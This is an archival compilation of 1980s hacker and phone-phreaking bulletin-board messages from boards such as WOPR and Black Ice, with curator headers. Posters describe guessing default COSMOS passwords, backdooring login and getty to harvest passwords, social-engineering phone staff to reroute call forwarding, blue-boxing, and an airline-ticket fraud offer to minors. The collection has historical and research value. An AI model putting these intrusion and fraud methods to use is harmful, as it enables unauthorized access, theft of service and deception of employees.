BY ASKING FOR "OLYMPUS". I HEAR THERE
ARE TAPES OF THE CALL FLOATING AROUND... 
800-424-9xxx IS A WH. HOUSE PRESS RECORD
ING,THAT CAN BE QUITE 
FUN, IF YOU LIKE RON'S SPEECHES EARLY...
 
                DIAL ANYWHERE, 
                BUT DIAL WITH CARE 
                --BOB-- 
 
 
 
Msg.  :111  
About :***WARNING!!!***
>From  :JIMMY HOFFA
To    :***PHELLOW-PHREAKERS***
Date  :2/19/83  00:00
 
"FOR ALL YOU *PHELLOW-PHREAKERS* OUT THERE......
there seems to be some "negativeness" out there from a few
select peo`le!. WELL, For one thing "THEY" must realize
A "*PHREAKER*" IS *NEVER* "*NEGATIVE*" (TAKE NOTE!!.
RODGER-OLSON!!).. We ARE A SELECT BREED WHO HAVE BEEN
BLEd WITH A REAL UNSATISFYING "THIRST" FOR..
"@KNOWLEDGE*" and Willing to share with "PHELLOW-PHREAKERS".
WE CAN DO ANYTHING *MA* CAN DO, ONLY WE CAN DO IT BETTER!!!!!
WHO NEEDS "PESSIMISM" ANYWAY???? DID PESSIMISTs HELP BUILD OUR
COUNTRY, OUR COMPUTERS, OUR WORLD AROUND US???
NO!!! POSITIVE THINKERS DID, THAT'S WHO!!! PEOPLE WHO HAVE A
NEVER-ENDING THIRST FOR KNOWLEDGE, CHALLENGE, AND FOUND NEW
IN-ROADS TO HELP BETTER OURSELVES!!!
THESE ARE WHAT "I" CALL THE "*REAL*" "PHREAKERS"!!! HOW ABOUT
YOU!!! WE CAN TURN NEGATIVES TO POSITIVES EASIER THAN MOST CAN
BRUSH THEIR TEETH! WE DON'T NEED NEGATIVES BECAUSE THERE'S
ALREAXDY TOO MANY OUT THERE! WHAT WE NEED IS MORE PEOPLE WITH
A POSITIVE-MENTAL-ATTITUDE THAT CAN HELP FURTHER OUR
QUEST FOR KNOWLEDGE GAINING A SATISFACTION UNBEKNWNST to
"NEGATIVE"-"PESIMISTIC" PEOPLE!
HAD TO SAY IT AND I DON'T REGRET IT!
THIS WAS A>>>>>>
****PUBLIC************
****SERVICE************
***ANNOUNCEMENT*****************
 
 
_____________________________________________________________________________
 
 *** {WOPR (617) SYSOP: Terminal Man. WOPR was a private phreak board and} *** 
     *** {was considered one of the best H/P systems of the time. The} ***
       *** {following Messages are from 1984 unless stated otherwise} ***
 
 
Message #33: QUORUM
Msg left by: KING BLOTTO
Date posted: TUE MAY 29  3:13:14 PM   {1984}
 
 
TO ALL MY SUBJECTS:
 
       THIS TOPIC IS ABOUT CONFERENCES.
AS MANY OF YOU KNOW, I DON'T CONFERENCE
ANYMORE SINCE INFOWORLD PUT OUT AN
ARTICLE ON IT ON MARCH 26. THE REASON
BEING: THERE ARE N-O SAFE EXCHANGES
BEING USED TODAY. EVERYONE SAYS; "BUT
THIS IS CHICAGO", "THIS IS A DALLAS
EXCHANGE", "THEY CAN'T TRACE CONFEREN-
CES!". THE LAST ONE IS MY FAVORITE. THE
SYSTEM USED BY ALMOST EVERYONE TODAY IS
ALLIANCE TELECONFERENCE. THIS IS NOT
BELL OPERATED. QUORUM IS THE BELL CONF.
SYSTEM. AND IT'S WORSE THAN ALLIANCE.
NEWS HAS IT, THAT ALLIANCE TELECON-
FERENCE MIGHT BE GOING UNDER NOW. BUT
THEY HAVE STARTED TAKING PEOPLE WITH
THEM. ( 5 TO DATE, AS I KNOW) ALLIANCE
IS SUPER-PISSED, WELL, WOULDN'T YOU BE?
AND ESPECIALLY AFTER EVERY LITTLE 15YR
OLD LEARNS HOW TO START ONE UP, HE'LL
BE JUST GETTING THEM MORE PISSED OFF.
THE ABUSE HAS GROWN TO A MAXIMUM. I AM
TRYING TO FIND OUT ALL I CAN ON 
QUORUM AT WORK. I'LL POST THE INFO AS
IT COMES IN.
 
 
                        MAJESTICALLY,
 
                         KING BLOTTO
 
P.S.- READ THE 3/26/84 INFOWORLD!
 
 
 
<1-48 LAST=33 E=mail Q=Quit T=Titles>
 
 
---------------------------------
69> COSMOS & UNIX
---------------------------------
Msg left by: BIOC AGENT 003
Date posted: MON AUG  6 11:18:23 AM
 
COSMOS is basically a modified UNIX sys
tem.  When a non-priviledged COSMOS
user logs on, a program usually called 
/BIN/PERMIT is run.  This tells the
system which COSMOS commands the user i
s allowed to use.
 
On the other hand, when a priviledged u
ser logs in (ie, root, sys, bin, or
preop), he is put into the normal UNIX 
shell (SH) where he can utilize
UNIX commands such as:  who & cat /etc/
passwd (which will printout the 
password file).  These users can also t
ype CHDIR /USR/COSMOS and use ANY of
the COSMOS commands since COSMOS is rea
lly a sub directory in a UNIX system.
They also have a bad (good?) habit of l
eaving administrative notices and files
(such as the decrypted passwords) layin
g around in different directories of
the system.  In fact, one system down i
n Washington, DC has a BIN account
with no password (!) until some ASSHOLE
 decided to change the message of the
day"I broke in, ha, ha  --Joe Smuck"!!!
 
If you can't get into one of the privil
edged accounts then you might as well
try for a regular COSMOS account.  The 
typical setup is two letters followed
by 2 numbers.  Here are a few common on
es:
 
 
TRxx (TRaining -- eg, TR01, TR02, etc.)
LSxx(Lac Staff)
LA   (Line Assignement)
FMxx (Frame Manager)
NMxx (NAC Manager)
RSxx (Repair Service)
LMxx (LMOS debug)
etc...
 
You best bet would be too go for one of
 the managers accounts such as NM01.
There is also usually a user-name of CO
SMOS on the system.
 
The passwords are usually pathetic.  Tr
y things such as:  COSMOS, FRAME, TELCO,
etc.)  Also try simple words such as:  
CAT, BAT, RAT, etc.
 
You'll have to guess at the Wire Center
, though (WC).  It will always b 2 
letters.
 
Excelsior,
 
 
---------------------------------
 
1-79 LAST=69
[E]mail
[A]bort
[T]itles
:
 
---------------------------------
78> Intro To C Search
---------------------------------
Msg left by: LORD DIGITAL
Date posted: FRI AUG 17  6:20:13 AM   {1984}
 
Ok what the program "C PW Scanner",  or
 "The C Search" does is fairly 
simple. It reads through the main passw
ord file searching for a match between 
A person's name and password and compar
es the two. If they match, or if
a person's pw is simply his name spelle
d backwards. it will write the 
pw's into a file name of your choice. T
his should net you several paswords
for every scan at least. The percentage
 of stupid people on any given 
system is usually quite high. The entir
e search should take about 5 mins.
Obviously it can't do too much consider
ing everything is crypted...
 
The entire program is internal, and ass
umes you have at least one accnt.
allready present on the system in quest
ion.
 
Instructions :>
     Pretty simple, all you do is: Uplo
ad the text file, use the CC (Compile
     C) utility, which will give you th
e "a.out" (assembly out), now just
     rename the file (mv) to whatever y
ou wish to call it...
 
If anyone wants to trade various C prog
rams (trojan horses (not that kind),
programs that search for ports with out
dial capabilty, etc...) leave e-mail
 
                                       
                  later-
 
      .../\^ lord digital ^/\...
             ------------
         -Spectral -- Phorce-
 
 
---------------------------------
 
1-90 LAST=78
[E]mail
[A]bort
[T]itles
:
---------------------------------
83> the old fashioned way...
---------------------------------
Msg left by: BIG BROTHER
Date posted: FRI AUG 17 10:36:45 PM
 
  It might be just as easy when hacking
 idiot's passwords (User Name, same 
again; first name, same again; etc.) to
 do it the old-fashioned way--by hand.
Hey, in half an hour I found 15 account
s on my 'private' 617 VAX VMS 3.6.
Some of them are even partially privili
ged.
  Another thing, always try default pas
swords.  If the system lets priv'gd
users log in thought dial-in lines and 
the default psswds are still there,
you've struck gold.  As the wise man sa
y, "Keep it to yourself."  I once
the phone number to a Ztel Prime system
 (linked to Primenet which eventually
links to milnet) with my operator accou
nt (User:OPERATOR, no password--default)
 to a few people.  They abused the acco
unt(created 10 or 15 other accts for 
themselves) and it died within days....
---------------------------------
 
1-90 LAST=83
[E]mail
[A]bort
[T]itles
:
---------------------------------
85> Pissed As SHIT!
---------------------------------
Msg left by: SHARP RAZOR
Date posted: SAT AUG 18  4:09:16 AM
 
That is right! i finally have the time
and sit down and work with my Wash. DC 
BIN and PREOP accounts, and 'lo and 
behold...i call up (i hadn't called for
about 5 days) and the #'s were changed.
...not 1..but all 4 dial-ups!!
Talk about an abused system! Some of yo
u may not know it, but someone logged
on and left a cute logon bulletin to
all the AT&T bus. people, etc...that
went sort of like 'haha, Kilroy wuz
here!'...(real cute and intelligent,
huh??)..besides that...there were times
when I would call at 2AM on a weekday,
and see 15-20 people on-line...
...and all on the same account!!!
(since the # is changed, I can say it
WAS the MF01 act. they were using)
Let this be a lesson NOT to go around
POSTING COSMOS dial-ups on anything
besides a very private BBS,and especial
ly not the pw's!...I KNOW that the
lower level accounts were given away..
..but I hope at least the sysop ones
weren't..in any case this really shows
me not to be so liberal when I hand
out COSMOS pw's again.
..Later..
..Sharp Razor>>
 The Legion of Doom!
 
(dont worry, I am just a bit po'ed now,
but I MAY get over it!!)
---------------------------------
 
1-90 LAST=85
[E]mail
[A]bort
[T]itles
:
 
 
Message #87: MORE ESS
Msg left by: PAUL MUAD'DIB
Date posted: TUE JUN 19  2:59:05 PM
 
 
I've got many switch and frame #'s to
trade, and here's a fun way to get pw's
or destroy bbs's-
 call the switch and do what I said 
 in msg 78 asking for call forwarding
 on an anonymous # (NOT your local tym-
 or tele- nets, they DO know them to be
 special dials)..when he puts it in, 
 call the "frame" #, and say "Hiya, 
 this is Bob Lineman, could you run
 into the MDF, and try to activate the
 call forwarding on NNX-XXXX? send it
 to NNX-XXXF, please, I need to check
 it out from both ends..." then, hook
 your computer up to the payphone that
 NNX-XXXF is, and set up a simulator
 for the login to that system. When you
 have it in your pocket, call the frame
 back and say "Hi, me again, would you
 just disengage the forwarding on that
 # for me? I've got the problem, but I
 need it recieving calls to fix it.."
 then you can re-hack it later if you
 want by just calling the frame again
 in a different shift..
 
 later,
  Paul Muad'Dib
   Legion
    of 
     Doom
 
1-90 Last=87 E=Mail Q=Quit T=Titles -
 
 
 
Message #38: BOSTON COSMOS
Msg left by: DOCTOR WHO
Date posted: WED MAY 30 10:16:55 PM
 
 
OK HERE IS A FRESH COSMOS DIALUP..SORRY
NO PASSWORD...GO TRASHING BOSTONIANS!
617-338-5xxx
 
SPEAKING OF COSMOS, I WENT TRASHING TOD
AY AND GOT A COSMOS PASSWORD. IT SEEMS
TO BE A HIGH ACCESS ONE, THEY BROKE IN
ON THE GUY USING IT TO DO MAINTENANCE.
THE NAME IS FF01. NOW ALL I NEED IS THE
DIALUP. I CAN'T SCAN WITH MY MODEM. IF
ANYONE WANTS TO DO A LONG-DISTANCE SCAN
OF 413, I WILL GIVE YOU THE EXCHANGES T
O HACK, AND THE PASSWORD. PLEZE! 
OH, IF THERE ARE ANY PHREAKS IN THE 413
NPA READING THIS, PLEASE REPLY..ITS 
LONELY OUT HERE! CONFERENCES: TOO BAD
IF A COMPANY GOES OUT OF BUSINESS BECAU
SE OF PHREAKS...ONE LONG-DISTANCE COM
PANY WHO IS BUGGING ME SAYS THAT PHREAK
ING IS FORCING THEM OUT OF THE BUSINESS
THAT IS BULLSHIT. DON'T BELIEVE IT.
THE PHONE CO.'S MAKE SO MUCH PROFIT ITS
PITIFUL. IF IT WASN'T FOR PHREAKS 
WE WOULD STILL BE STUCK WITH SXS. SO WE
HAVE CREATED MANY JOBS..IN AT+T, GTE, I
TT...AND IN THE FBI. SO FEEL GOOD..YOU'
VE HELPED THE ECONOMY! I HEARD THAT MCI
TAKES A BIG TAX LOSS ON STOLEN SERVICES
. MUCHO BUCKS SAVED! THATS ALSO (PROBAB
LY) THE REASON THE METROPHONE DOESN'T TR
Y HARD TO CATCH PHREAKS. 
  YOU KNOW IF THERES ONE THING I CAN'T 
STAND ITS POLITICS AMONG PHREAKS..ONE
PERSON TRYING TO MAKE OTHERS L1 %'AD
AND SAY" I RULE!" YOU KNOW WHAT I MEAN?
YOU PEOPLE WHO I'ME TALKING ABOUT: NOW
THAT YOU'RE HERE UNDER DIFFERENT NAMES,
TRY TO BEHAVE!..'NUFF SAID
THE T.H.A. (TIMELORDS HOLY ALLIANCE) IS 
THE GROUP THAT REALLY RULES..BECAUSE WE
DON'T HAVE ANY RULES...NO INITIATION..
NO NOTHING...AND YOU NEVER HEAR ANYBODY
BADMOUTHING US, DO YOU?
IS THERE A GOOD WAY TO BULLSHIT THE 
FONE CO. FOR THE COSMOS DIALUP?
BYE....
 
-----------=?> DOCTOR WHO <?=----------
 
 
 
<1-48 LAST=38 E=mail Q=Quit T=Titles>
 
---------------------------------
MESSAGE #81: HACK-A-TRIP
---------------------------------
Msg left by: BROADWAY HACKER
Date posted: TUE JUL 24  8:24:02 PM
 
As you have probably seen on some other
 good boards, I am ex-
tending an offer to anyone who wants to
 come to New York for 
free. Hacking airline tickets isn't as 
hard as you think. If 
your interested, maybe to go to a TAP m
eeting or something, 
leave me EMAIL. It is relatively easy, 
but one screwup can ruin
you. There are others who may have some
 idea how this is done, 
but have not actually done it. Leave me
 EMAIL if your interest-
ed. You must be a minor, however, and y
ou must leave me a VALID
phone number in feedback since there ar
e security measures in-
volved since it is grand fraud.
 
*** Broadway Hacker ***
(-+-)(Chaos)(+-+)
 
Hack-a-trip
 
 
---------------------------------
MESSAGE #63: ARGGGH!
---------------------------------
Msg left by: KARL MARX
Date posted: SAT JUL 21  4:14:43 PM
 
Ahem, I don't know if I am getting moral
or something, but things are getting
pretty, well, strange.
 
First off: unix is pretty easy to crash
if you want to--but why would you want
to?  Obviously, very few people know
"everything" about Unix, and I would
like one reason that destroying a system
would be better than learning to use it's
"special" features.  If you want to get
your face on Newsweek, go ahead, but
otherwise, don't start destroying stuff
just for the sake of vandalism!  Instead
of being a vandal, do somthing Robin
Hood-ish, like nice the parent process
of the batch runner to -20 or somthing.
 Or give everyone full privilige
to / or make them all user 1.
 
Otherwise, as for metro tracing, that's
kinda hard to swallow.  Would whoever's
friend's sister care to elaborate on that
one?
 
I don't know if anyone cares, but I had
a chance to take a look at those
"goldphones" and Geez!!!  There were
codes written all over it!  I don't 
understand some people very well.  That
is simply stupidity. 
There is really nothing "new and exciting"
in phreaking anymore...  most of what you
hear is bullshit from some twelve-year-
old that just learned how to use metro last
week.  There is simply no "new" anything!
Eventually there will be, but until then
these "phreak" boards will simply be
"how to phreak"--tutorials instead of
journals.  Drat!
:::::::::::::::::::::Karl Marx
                     LOD
---------------------------------
 
You have been on over your time limit.
Use the 'O' option to log off.
 
____
 
 
Logout Job ??, TTY ??,
   On   21-7-84 For 34 Minutes
 
 
_____________________________________________________________________________
 
   *** {Samples from the Phoenix Project BBS (512), Sysop: The Mentor} ***
   *** {As many are aware, the Phoenix Project was one of the intended} *** 
    *** {targets in the Hacker Crackdown of 1990 and was erroneously} ***
         *** {affiliated to Steve Jackson Games' Illuminati BBS} ***
 
 
                       *** {Other Networks Sub-Board} ***
 
8/60: Autonet...
Name: Erik Bloodaxe #2
Date: Thu Jan 11 13:18:39 1990
 
It wouldn't be such a great idea to scan Autonet through the Telenet
gateway.  Autonet raised a holy shit-fit when Urvile was doing it
about a year ago, and sent Telenet Security all kinds of nasty
mail bitching for them to stop whoever in 404 was connecting to their
system.  Telenet blew them off, but if it started again, Telenet might
just have to listen to their whining and crack down.  
I suggest you (or whoever is planning on this) do your scanning through a
main dialup.  It will be slower, but probably safer in the long run.
->ME
 
 
 
46/60: pac*it
Name: Corrupt #114
Date: Thu Feb 01 06:59:10 1990
 
pac*it plus calls 03110..germany and spain..I didn't think it called DPAC. 
usefulfor scanning spain..but at this point......hmm I'd be scared of what
MCI i would do then GM...
anyone up on Kinneynet?hehehehehe
I'll post the dialup later but u need a NUI for it :-((
Develnet? I thought the Develnet was just x.25 server software! I've seen 
several Develnet pads and I  had gotinto thesystems it connected to and they 
weren't MEAN related...maybe I'm wrong?(it was a modm company.)
Needless to say I was pissed when everyone used it todeath just to see a 
pretty (canada)..the reason it diconnects is because of where you're calling 
from..if you call from canda u probably won'T expirence this problem....on the
 
03110 develnet..same thing cept  you have to be at console...there are still 
somesystems availble from there that r open..here'Sone IBM <-i couldn't hack 
it so of course I posted that one:-))
C U-->greets from [8lgm]corrupt
 
 
 
                         *** {The HP-3000 Sub-Board} ***
 
36/41: Woah!
Name: Erik Bloodaxe #2
Date: Mon Jan 22 03:36:40 1990
 
I wasn't ragging on MPE!  Not at all, i was just "JOking" about the large 
numbers of hp-3000 systems around the world and the unbelievable ease in 
gaining access on one.
Geez, read...MPE seems ok, just kinda hard to get used to.
I mean, I'm in HUNDREDS of hp's, but until last year I didn't know what to do 
with them...so they just sat there.
UNIX is just as lame security-wise, but On a percentage basis, I have gotten 
into 85-90% of the HP's I have found, while I've only gotten into abot 50% of 
the UNIXes I've found.
(Look at me grovel before one of the two HP experts I've ever seen...pathetic,
isn't it?)
Wiz, no offense intended towards your adopted O.S.
->ME
 
 
                        *** {UNIX Sub-Board} ***
 
60/69: both ways
Name: Corrupt #114
Date: Mon Feb 05 05:08:25 1990
 
nice trojans
------------
good security
 
this works both ways....look-out for unixes(and VMS sites) that keep another 
copy of /etc/passwd (or sysuaf.dat) and everynite rewrite it over the one
used for login(some any mods are discovered)..u can alternatly install some 
security inside likethis for yourself...(hide it in CROn) (or wherever u want 
on vms:-)) undersytand? I know I'm not clear:-((
but thats works for you sometimes and it'S simple if you know script:-)
anyone here into Rapid Fire hacking?
 
 
                    *** {Electronic Banking Sub-Board} ***
 
12/32: Treason & Government Smegma...
Name: Erik Bloodaxe #2
Date: Fri Jan 19 02:06:13 1990
 
It's the Major SS buzzword these days.
Treason.  If someone is poking around in ANY system they feel is 
sensitive (although they leave sysdiag unpassworded, or lp password lp, etc..)
they will then label you as:
"A Serious Threat to National Security!"  
Give me a break.  Hell, I think my association with Par & Phoenix alone
is enough to get me the firing squad.  I haven't even done anything, 
but it seems that everything bad that's happened I keep getting
brought up, as I know such and such, or I somehow know EVERYTHING about
how such and such happened.  
Well, I've tried my best to be good, and stay out of government things, 
military things, etc...  I've even edited out the "sensitive" things I've
run across in the Telenet scanning just for their sense of well being, 
but if I begin to feel threatened, it's all going out.   Unabridged.
We will see...I'm already getting nervous...the feds are already pissed 
that LOD is still kicking, and this bbs must have SLAMMED it into their
faces.  And I know that the EFT files must have pissed them off as
well, although that may or may not have anything to do with
this bbs suddenly going back up.  
Well, I'm not a threat to ANYTHING, except myself maybe.  Anyone who
knows me knows that.  Back me up people.  This is my public announcement
of not-guilty to any and all crimes against the Security of the United
States.  So what if I was scanning 2502 a while back?  Anyone ever think
that it would be in THE INTEREST OF NATIONAL SECURITY to hop into a
Soviet system?  I thought it would.  
Par knows what I mean.  Hell, The government now seems to think he's a spy, 
and wants to shoot him.  Killing Teenagers for fun is not my idea of 
constructive problem solving guys.  Take an extended course in the 
ways of the hacker.  That education might do you all a world of good.
You may even pick up something you missed in your little weekend getaway
training seminar in fighting computer crime.  When you come and kick in my
door, (don't step on the cat), and if you don't blow me away first, 
maybe I can educate you all a little better on what is REALLY GOING ON!
(This message posted for the Secret Service & CERT, et al. whomever is
 posing on here, or reading this via Mentor's & My own Data Taps)
->ME
 
 
 
                     *** {Phone Co. Computers Sub-Board} ***
 
3/46: LMOS
Name: Acid Phreak #8
Date: Tue Jan 09 17:56:23 1990
The most recent LMOS interlude was one in my local area.  Got the host 
processor (an IBM 3270) off Predictor.  Overall, a very handy tool to add to
your telco 'collectables'.  The FE's of course were PDP 11/70s using MLT for 
reference.
Aw thit.. lookit all dem Hicaps.
--ap
  (advanced phreaking)
 
 
6/46: ICRIS
Name: Phiber Optik #6
Date: Wed Jan 10 16:37:27 1990
 
Not to nitpick, but an LMOS CP is an IBM S370 (3270 is an SNA, used to get to 
BANCS through LOMS for instance).
CRIS, as mentioned, the Customer Record Information System is a dandy little 
IBM system whose main purpose is to house customer records. There are a small 
handful of "CRIS" systems, like LCRIS (Local), and ICRIS (Integrated, which 
should be noted is used by the Residential Service Center). Here in NYNEX, the 
only way to reach these systems  (we obviously aren't hardwired hackers) is 
through BANCS, a bisync network. BANCS is not direct dialable, but IS 
available through a 3270 link on the LOMS system, used by LDMC (LAC or FACS, 
depending where you live). And LOMS IS accessible. A host of systems are also 
available through FACS (which can be reached through LOMS on BANCS) such as 
CIMAP, LMOS, SOP, TIRKS, the COSMOS-PREMISE interface, etc. So as you can see, 
rather than going after any specific system, going after the RIGHT system will 
pay off greatly (LOMS in this example). Oh, waitta-minnit, those mentioned 
systems are off of BANCS, sorry. You can reach FACS on BANCS, and access a 
couple 'o things like some of those mentioned, COSMOS (certain wire centers 
only), etc. OK, enough rambling. Let's hear someone else's input.
Phiber Optik
Legion Of Doom!
$LOD$
 
____________________________________________________________________________
 
 
 
           *** {The Twilight Zone BBS (203), Sysop: The Marauder} ***
         *** {NOTE: All messages from 1985 unless stated otherwise} ***
 
 
[MSG #12 OF 22]: INWATS & X-LATIONS
 
FROM: THE MARAUDER
DATE: MAY 08     {1985}
 
Under CCIS, INWATS (800's) are handled completely different from the older
method (the old method i don't completely uderstand, but it translated
somehow based on it's own prefix & suffix). under ccis on the other hand,
inwats #'s are handled in the following manner: when the 800 number reaches
your toll office, a query is made to the 'INWATS DATABASE', (the master
database being at the KC RNOCS I believe), i believe each RNOC (regional
network operations center, of wich there are 12, one for each region), has
their own database (which is updated on a regular basis). a query is made
(via a CCIS link) to the inwat's database, and a POTS (plain old telephone
service, just a plain 10 digit ddd telephone number, ie: npa+pre+suffix), and
the POTS number is pulsed out from the toll center and your call is completed
just like a normal ddd (direct distance dialing) call, talthough it was noted
that the call was an 800 at the origination (your) toll office, so and you
are not charged foor the call.. with this in mind, it's a simple matter for
the inwat's database that handles your reigon to return a translation that
differs from another reigons translation, for example say fred phreak in
new jersey places a call to LDX extender service at 800-XXX-3333, upon
reaching his toll center, the toll center quereys the inwat's database that
handles new jersey, and a POTS translation is returned which for obvious
reasons would be the closest port to him, so let's say the translation was
(201)-XXX-4455, the toll office upon recieving this would proceed to complete
the call, and fred phreak would be connected to LDX at (201)-XXX-4455..
 
continued next..
 
 
 
 <1-22, ^12> [?/HELP]: 
 
[MSG #13 OF 22]: ABOVE CONT'D
 
FROM: THE MARAUDER
DATE: MAY 08
 
now, on the other hand let's say bill phreak in california calls the LDX 
extender service at (800)-XXX-3333 (same number fred called from NJ), his 
regions inwat's database may return a completely different POTS x-lation say 
(213)-XXX-1119, again being ldx's closest port to bill phreaks toll center..
 
utilizing ccis, and inwat's databases, other clever things are possible for 
example, as you all know ALLIANCE teleconfrencing is unavailable on 
weekends, here's how that works: when you dial 0-700-XXX-1000, that number 
is intercepted at TSPS and translated into a corresponding WAT'S number, for
this example, we'll say it translates to (800)-XXX-1003 (white plains), and 
forwarded from tsps to a toll center, the toll center upon recieving the 
800-XXX-1003, queries it's inwat's database and a POTS translation is 
returned say 914-XXX-6677, which is the DN (Directory Number) for the 
bridge-center. now on a weekend, the inwat's database, instead of returning 
914-XXX-6677 may return 914-XXX-0077, which would terminate at a recording 
saying alliance is not reachable on weekends.., that's why everyone is 
alway's interested in the 'ALLIANCE TRANSLATIONS'. Because if you have the 
x-lation you can simply use a blue box to route yourself directly to the 
bridgecenter and bypass the whole tanslation procedure..
 
any questions, please post..
 
The
  Marauder
Legion of Doom!
 
 
 
 ____________________________________________________________________________   
 
            *** {Black Ice Private (703) BBS Message Base Sample} ***
       *** {Black Ice had a VERY restrictive user base as shown in the} ***
      *** {included userlist. The quality of the messages was excellent} ***
 
 
%> Sub-board: Advanced Telecommunications
%> SubOp:     ANI Failure
%> Messages:  100
%> Files:     0
 
 
%> Message:  32 of 100
%> Title:    800 xlations
%> When:     12/16/88 at 2:45 am
%> Left by:  ANI Failure [SubOp] [Level: 8]
 
You can get them from a 4ess or some work centers like RNOC and RWC (good luck,
have a dialback).. Or from ONAC in Kansas City (816). The Operations Network
Adminstration Center is the focal point for 800 services in the AT&T network.
ONAC works in conjuction with the AT&T WATS centers (I think there are 3?) and
800 service co-ordinators to do operations, adminstration, and maintenance on
the 800 number network. You can reach the WATS centers phree of charge with a
959 plant test number in the correct NPAs (I know 914 has one). I think it was
959-5000 but that might be wrong.
 
The tech. term for an 800 xlation is a plant test number. This does not have to
be pots, but can be other system codes like 122, 195, 196, 123, etc. The only
type of 800 number that terminates in POTS is a READYLINE 800 number (AT&T). I
don't know about sprint, mci, etc. though. A good topic for investigation
though, thankx for the idea!
 
If you have access to a 4e (does anyone on her have this? If so I'll trade
anything I have for a 4e), you can type this in to translate a number:
 
well....i can't find the right notebook. it is somethink like:
 
TEST:DSIG;INWATS 800 nxx xxxx!
 
This does a Direct Signaling (DSIG) message into the 4E which commands the 4E
to pull the 800 internal number from the network control point (NCP) over CCIS
links. The 4E you are on must be included in the service area of that 800
number though, i.e. someone in the area served by that 4E would have to be able
to dial it in order for the 4E to have the xlation. So if the 4E is not in the
right area it will say 'NON SUBSCRIBED' or something of that nature. Oh, I just
remembered, there is an AT&T work group named DSAC (Direct Signaling Admin.
Center) that performs direct signaling messages into switches and things. If
you want the DSAC #, I can provide it..I don't think too many phreaks have
their number so they might be worth engineering.
 
Oh - the 800 xlation input message into the 4E was social engineered a long
time ago by The Marauder and Phucked Agent 04 from an RWC. But, thanks to a
fuck up by The Executioner and friends, the RWCs became very tight lipped...it
only takes 1 fuckup...
 
Um, I have gotten translations from the customer before, posing as AT&T and
giving them bs about 'MLT has found a potential trouble in your circuit' (haha)
and we need your translation number. I only did this once since I have never
had any major need to pull 800 xlations. But that will work in some cases if a
human answers. Or if you can get the terminating company name/location, you can
keep engineering and narrow down the locations of the xlation (say within their
centrex group or something) and then (ughh..dangerous and slow) scan for the
number, or do more engineering for it, etc...
 
There is an easier way to get 800 translations but I swore not to tell anyone
(that was the conditions of me getting the info) from a certain AT&T dept and a
certain support system...if you want a translation in an AT&T area I will try
to get it for you though....so leave mail or post and maybe I can help..
 
ANI-F
 
legion of 800 numberz
 
 
____________________________________________________________________________
 
 
                        *** {UNIX Sub-Board} ***
 
 
%> Sub-board: UNIX
%> SubOp:     The Prophet
%> Messages:  99
%> Files:     1
 
 
%> Message:  5 of 99
%> Title:    getty, login
%> When:     12/16/88 at 6:19 pm
%> Left by:  The Urvile [Level: 8]
 
for getty, just check and see if the first entry is <something>, where that is
your back door, of sorts.  the init program will have to be a bit (?) larger
than the original, considering that you'll have to put in the stuff to make it
set up your environment & exec /bin/sh.
login, on the other hand, can put a backdoor in the gpass() routine, which can
conveniently write the passwds to a file.  not too useful to have lots of
passwds in an already backdoored system, you say?  bull.  there are lots of
southern bell systems i've gotten into by using the same passwds as the hacked
system.  also, what if they remove the backdoor?  too bad, it'll take you an
hour or so to put the source up & modify it again.
one thing that i've been thinking about: on a system, backdoor getty, login,
(for the reasons cited above), and something like 'date', to check 1) if root
is using the program, and 2) to see if your handy dandy login has been erased,
and put it back if 3) a day or so has elapsed from the last call of the 'date'.
well, i thought it was a good idea.  much better than using cron & whatever to
put a username in the passwd file.
encryption on cosmos:
it's strange, to be sure.  i tried putting a 404 cosmos passwd on your 602
cosmos. The user id's were different, the versions of cosmos were different, i
think, but the username was the same.  has anyone ever seen ANY (no matter how
old) cosmos login source?
incidentally, is anyone doing anything on sbdn of late?
scanning for addresses is generally a bad idea.
 
 
               *** {SPCS/OSS Information Sub-Board} ***
   *** {Stored Program Control Systems / Operations Support Systems} ***
 
%> Sub-board: SPCS/OSS Information
%> SubOp:     ANI Failure
%> Messages:  97
%> Files:     1
 
 
 
%> Message:  19 of 97
%> Title:    DMS
%> When:     12/28/88 at 10:20 am
%> Left by:  Epsilon [Level: 8]
 
I found out some things about DMS if anyone's interested.  I only spent a
little while looking around, but I managed to figure out that the DMS does
indeed have a sort of tree structure.  I haven't figured out the structure of
TABLES yet, but I kind of know how the rest works.  Watch..
 
 Ok, from the > you can enter tasks, (I prefer to call them toolboxes because
they're like little tools you can run to perform different things.)  For
instance, you have one called LOGUTIL which is some sort of utility that keeps
tabs on various things, and you can view the logs kept.  After you have entered
LOGUTIL, you can type LIST LOGUTIL and it'll spool out commands.  You can also
type LIST LOGS to see a list of logs that are kept.
 
 The next thing I was fooling with was SERVORD, which is obviously some type of
Service Order processing software.  This toolbox is much friendlier, as it does
include the help command, and it provides help on the syntax of each command.
Unfortunately, it does not give each parameter for each command.  I'm sure that
would take up quite a lot of space.  I think you're going to need a manual to
really do anything cool with SERVORD, but hey..
 
 Sorry if you people knew all of this already.  I guess I'll keep posting about
it as I learn more.
 
 Sheesh.  Lame post.
 
 Epsilon
 
____________________________________________________________________________
 
                   *** {Userlist as of Mid-May it seems} ***
 
%> Black Ice Private User List <%
 
Name                             Level      Status       Posts     Last on
===============------------------=====------======-------=====-----=======--
System Operator                    11       Sysop         33       5/16/89
The Mentor                         11       Sysop         59       5/16/89
Epsilon                            8        Charter       106      5/8/89
The Prophet                        8        Charter       59       5/15/89
ANI Failure                        8        Charter       220      5/6/89
The Urvile                         8        Charter       71       5/4/89
Doc Cypher                         8        Charter       56       5/13/89
Lex Luthor                         8        Charter       21       5/10/89
The Leftist                        8        Charter       20       5/14/89
Erik Bloodaxe                      8        Charter       75       5/17/89
Empty Promise                      8        Charter       16       5/5/89
Generic 1BED5                      8        Charter       46       5/16/89
Skinny Puppy                       8        Charter       93       4/23/89
Jester Sluggo                      8        Charter       32       5/13/89
Red Eye                            8        Charter       31       5/2/89
The Marauder                       8        Charter       9        5/12/89
Ferrod Sensor                      8        Charter       10       3/30/89
____________________________________________________________________________
 
           *** {Tymnet (Packet Switching Network) Sub-Board} ***
 
%> Sub-board: Tymnet
%> SubOp:     Lex Luthor
%> Messages:  48
%> Files:     0
 
 
%> Message:  36 of 48
%> Title:    isis and elf
%> When:     3/25/89 at 12:37 am
%> Left by:  Lex Luthor [Level: 8]
 
I believe ANI was correct about the acronym for ISIS.
Internally Switched Interface System
I think it is the go between from the engine to the node code.  Kind of like
how assembly is the go between my apple and basic.
 
ELF - Engine Load Facility. This is a program that transfers and loads code
into a TYMNET Engine node.
 
ISIS has slots, in each slot a program (node code) can run. This node code
is different for different tasks.
 
I should clarify the above, only one 'application' ie: gateway, tymcom,
